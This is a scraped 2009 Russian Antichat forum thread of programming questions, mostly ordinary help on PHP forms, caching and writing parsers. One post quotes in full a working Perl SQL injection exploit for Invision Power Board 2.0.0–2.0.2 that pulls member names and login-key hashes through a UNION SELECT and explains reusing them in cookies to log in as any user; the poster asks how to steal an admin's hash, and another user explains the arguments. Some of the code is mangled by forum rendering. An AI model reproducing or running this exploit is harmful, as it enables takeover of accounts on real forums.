ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12571  
Старый 30.09.2009, 02:24
Аватар для Epic wave
Epic wave
Участник форума
Регистрация: 15.03.2009
Сообщений: 183
Провел на форуме:
3441717

Репутация: 160
По умолчанию

блин, ну вместо звезды твой файл
 
Ответить с цитированием

  #12572  
Старый 30.09.2009, 02:26
Аватар для Insane bboy
Insane bboy
Познающий
Регистрация: 11.07.2009
Сообщений: 58
Провел на форуме:
231064

Репутация: 6
По умолчанию

блин да пашет форма, значение передается скрипту index.php
 
Ответить с цитированием

  #12573  
Старый 30.09.2009, 03:53
Аватар для b3
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Выложи весь код, иначе так гадать будем до нового года
 
Ответить с цитированием

  #12574  
Старый 30.09.2009, 08:09
Аватар для wwa76
wwa76
Новичок
Регистрация: 11.03.2009
Сообщений: 2
Провел на форуме:
29840

Репутация: 2
По умолчанию

Помогите пожалуйста разобраться вот с этим сплоитом:


PHP код:
[QUOTE]#!/usr/bin/perl
use IO::Socket;

                  
#    #        #    #                                                                                                                                                                                                                                                                                                                                    
                  #   #          #   #                                                                                                                                                                                                                                                                                                                                    
                 #    #          #    #                                                                                                                                                                                                                                                                                                                                   
                 #   ##   ####   ##   #                                                                                                                                                                                                                                                                                                                                   
                ##   ##  ######  ##   ##                                                                                                                                                                                                                                                                                                                                  
                ##   ##  ######  ##   ##                                                                                                                                                                                                                                                                                                                                  
                ##   ##   ####   ##   ##                                                                                                                                                                                                                                                                                                                                  
                ###   ############   ###                                                                                                                                                                                                                                                                                                                                  
                ########################                                                                                                                                                                                                                                                                                                                                  
                     ##############                                                                                                                                                                                                                                                                                                                                       
              ######## ########## #######                                                                                                                                                                                                                                                                                                                                 
             ###   ##  ##########  ##   ###                                                                                                                                                                                                                                                                                                                               
             ###   ##  ##########  ##   ###                                                                                                                                                                                                                                                                                                                               
              ###   #  ##########  #   ###                                                                                                                                                                                                                                                                                                                                
              ###   ##  ########  ##   ###                                                                                                                                                                                                                                                                                                                                
               ##    #   ######   #    ##                                                                                                                                                                                                                                                                                                                                 
                ##   #    ####   #    ##                                                                                                                                                                                                                                                                                                                                  
                  ##                 ##           

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>]    DIR: /IPB202/
## [>]  FORUM: 2
## [>]  TOPIC: 1
## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>]     ID:
## ------------------------------------------------------------------------------------------------
## 
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
## 
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>]    DIR: /IPB202/
## [>]  FORUM: 2
## [>]  TOPIC: 1
## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>]     ID:
## ------------------------------------------------------------------------------------------------
## 
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
## 
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Пару слов о возвращаемом эксплоитом результате:
## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с
## помощью которого можно войти на форум под любым юзером без ввода пароля. 
## member_id это также одноименное значение из кукиса.
## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените
## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


if (@ARGV 5)
{
print 
"-------------------------------------------------------------------------\r\n";
print 
"       Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print 
"-------------------------------------------------------------------------\r\n";
print 
"usage:\r\n";
print 
"r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print 
"SERVER         - server where IPB installed\r\n";
print 
"/DIR/          - IPB directory or / for no directory\r\n";
print 
"FORUM_NUM      - number of existing forum\r\n";
print 
"TOPIC_NUM      - number of existing topic\r\n";
print 
"SID            - your session id\r\n";
print 
"[TABLE_PREFIX] - table prefix in database\r\n";
print 
"[USER_ID]      - user id for exploiting\r\n\r\n"
print 
"e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";
print 
"-------------------------------------------------------------------------\r\n";
exit();
}

if (@
ARGV 6) { $get_table 1; }

$server $ARGV[0];
$dir    $ARGV[1];
$fnum   $ARGV[2];
$tnum   $ARGV[3];
$sid    $ARGV[4];
$prefix $ARGV[5];
$id     $ARGV[6];

print 
"------------------------------------------------------------------------------------------------\r\n";
print 
"[>] SERVER: $server\r\n";
print 
"[>]    DIR: $dir\r\n";
print 
"[>]  FORUM: $fnum\r\n";
print 
"[>]  TOPIC: $tnum\r\n";
print 
"[>]    SID: $sid\r\n";
print 
"[>] PREFIX: $prefix\r\n";
print 
"[>]     ID: $id\r\n";
print 
"------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if (
$get_table == 1
 {
 
$path .= "&qpid=r57"
 
}
else
 {
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20"):("%20");
$path .= "/*";
 }
print 
"[~] PREPARE TO CONNECT...\r\n";

$socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80") || die "[-] CONNECTION FAILED";

print 
"[+] CONNECTED\r\n";
print 
"[~] SENDING QUERY...\r\n";
print 
$socket "GET $path HTTP/1.1\r\n";
print 
$socket "Host: $server\r\n";                                                                                                                                                          
print 
$socket "Accept: */*\r\n";
print 
$socket "Connection: close\r\n\r\n";
print 
"[+] DONE!\r\n\r\n";

$suc =0;

if (
$get_table == 1)
 {
 while (
$answer = <$socket>)
  {
  if (
$answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"$suc 1; }
  }
 if (!
$suc) { print "Exploit failed\r\n"; }
 exit();
 }

print 
"--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while (
$answer = <$socket>)
{
 if (
$answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"$suc 1; }
}
print 
"------------------------------------------------------------------------------------------------\r\n";
if (
$suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); }
else { print 
"Exploit failed\r\n"; }



# milw0rm.com [2004-11-22][/QUOTE] 

какие именно строчки в нем надо редактировать и что в них писать для того что бы стянуть хеш админа?
если заюзать этот вот что получается...:

C:\>Perl\sploits\3.pl [адрес форума]/1 1
-------------------------------------------------------------------------
Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
-------------------------------------------------------------------------
usage:
r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]

SERVER - server where IPB installed
/DIR/ - IPB directory or / for no directory
FORUM_NUM - number of existing forum
TOPIC_NUM - number of existing topic
SID - your session id
[TABLE_PREFIX] - table prefix in database
[USER_ID] - user id for exploiting

e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_

Последний раз редактировалось wwa76; 30.09.2009 в 08:42..
 
Ответить с цитированием

  #12575  
Старый 30.09.2009, 09:13
Аватар для Gray_Wolf
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Мда, вам же скрипт сказал что надо писать...

C:\>Perl\sploits\3.pl [адрес форума] /[*] [**] [ваш SID из куков] [префикс таблиц, скорее всего ibf_] [ID юзера, чей хеш надо узнать]

*,** - хз что это за поля, почитайте описание сплойта.
 
Ответить с цитированием

  #12576  
Старый 30.09.2009, 11:34
Аватар для .::BARS::.
.::BARS::.
Постоянный
Регистрация: 13.10.2007
Сообщений: 347
Провел на форуме:
1345617

Репутация: 115
По умолчанию

Insane bboy

кеш почисти и проверь....
если изменились данные на новые... то дело в кешировании...
 
Ответить с цитированием

  #12577  
Старый 30.09.2009, 13:07
Аватар для Gef3Dx
Gef3Dx
Новичок
Регистрация: 27.09.2009
Сообщений: 8
Провел на форуме:
14605

Репутация: -5
По умолчанию

Всем привет!

Хочу научиться писать парсер!
1. С чего начать?
2. Что для этого нужно?
 
Ответить с цитированием

  #12578  
Старый 30.09.2009, 13:51
Аватар для Deathdreams
Deathdreams
Постоянный
Регистрация: 08.11.2008
Сообщений: 498
Провел на форуме:
2603363

Репутация: 278
Отправить сообщение для Deathdreams с помощью ICQ
По умолчанию

1) Google, ищи мануалы.
2)Смотря парсер чего, нужно знания языка.
 
Ответить с цитированием

  #12579  
Старый 30.09.2009, 13:57
Аватар для min7
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию

Gef3Dx, изучай регулярки http://pyha.ru/forum/topic/19.0. Смотри примеры на ачате в теме http://forum.antichat.ru/thread92492.html
 
Ответить с цитированием

  #12580  
Старый 30.09.2009, 14:25
Аватар для REBUUS
REBUUS
Постоянный
Регистрация: 06.04.2009
Сообщений: 383
Провел на форуме:
1288105

Репутация: 328
По умолчанию

ПХП злодеи, кто может из из уина аси в пхп вытаскивать инфо , интересует город
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ